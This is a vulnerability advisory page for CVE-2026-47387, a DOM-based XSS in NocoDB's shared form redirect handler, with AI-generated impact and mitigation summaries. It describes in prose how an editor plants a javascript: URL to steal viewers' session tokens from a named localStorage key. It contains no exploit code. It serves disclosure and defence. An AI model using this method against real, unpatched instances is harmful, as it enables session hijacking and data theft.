CVE-2026-47387
Received Received - Intake
DOM-Based XSS in NocoDB via Malicious Redirect URL

Publication date: 2026-06-23

Last updated on: 2026-06-23

Assigner: GitHub, Inc.

Description
NocoDB is software for building databases as spreadsheets. Prior to 2026.05.1, the shared form-view submit handler (packages/nc-gui/composables/useSharedFormViewStore.ts) in NocoDB writes the form's redirect_url to window.location.href after a same-host check that does not validate the URL scheme. A user with editor role (or above) on any base can plant a javascript: URL in the form's redirect_url; when an authenticated viewer opens the share-link and submits the form, the payload executes in the NocoDB origin and can read the session token from localStorage["nocodb-gui-v2"]. This vulnerability is fixed in 2026.05.1.
CVSS Scores
EPSS Scores
Probability:
Percentile:
Meta Information
Published
2026-06-23
Last Modified
2026-06-23
Generated
2026-06-24
AI Q&A
2026-06-24
EPSS Evaluated
N/A
NVD
CVE-2026-47387
Affected Vendors & Products
Showing 1 associated CPE
Vendor Product Version / Range
nocodb nocodb to 2026.05.1 (inc)
Helpful Resources
Exploitability
CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-79 The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.
Attack-Flow Graph
AI Quick Actions
Instant insights powered by AI
Executive Summary

This vulnerability exists in NocoDB versions prior to 2026.05.1 in the shared form-view submit handler. The handler writes the form's redirect_url to window.location.href after performing a same-host check that does not validate the URL scheme.

A user with an editor role or higher on any base can insert a javascript: URL into the form's redirect_url. When an authenticated viewer opens the share-link and submits the form, the malicious JavaScript payload executes within the NocoDB origin.

This execution allows the attacker to read the session token stored in localStorage under the key "nocodb-gui-v2", potentially compromising the user's session.

The vulnerability was fixed in version 2026.05.1.

Compliance Impact

This vulnerability allows an attacker with editor role or above to execute arbitrary JavaScript in the context of the NocoDB origin, potentially accessing session tokens stored in localStorage. Such unauthorized access to session tokens can lead to unauthorized data access or data breaches.

Unauthorized access to sensitive data or session tokens can impact compliance with data protection regulations such as GDPR and HIPAA, which require protection of personal and sensitive information against unauthorized access and breaches.

Therefore, this vulnerability could lead to non-compliance with these standards if exploited, due to the risk of unauthorized data exposure or compromise of user sessions.

Impact Analysis

This vulnerability can lead to session token theft by executing malicious JavaScript in the context of the NocoDB origin.

An attacker with editor or higher privileges can craft a malicious redirect URL that, when triggered by an authenticated viewer, steals their session token.

With the stolen session token, the attacker could impersonate the victim, gaining unauthorized access to their NocoDB session and potentially sensitive data.

Mitigation Strategies

To mitigate this vulnerability, you should upgrade NocoDB to version 2026.05.1 or later, where the issue has been fixed.

This vulnerability allows an editor or higher role user to inject a malicious javascript: URL in the form's redirect_url, which can execute code and steal session tokens when a viewer submits the form. Upgrading ensures the redirect_url is properly validated.

Chat Assistant
Ask questions about this CVE
Hi! I’m here to help you understand CVE-2026-47387. Ask me anything about the vulnerability, its impact, or mitigation strategies.
0/70
EPSS Chart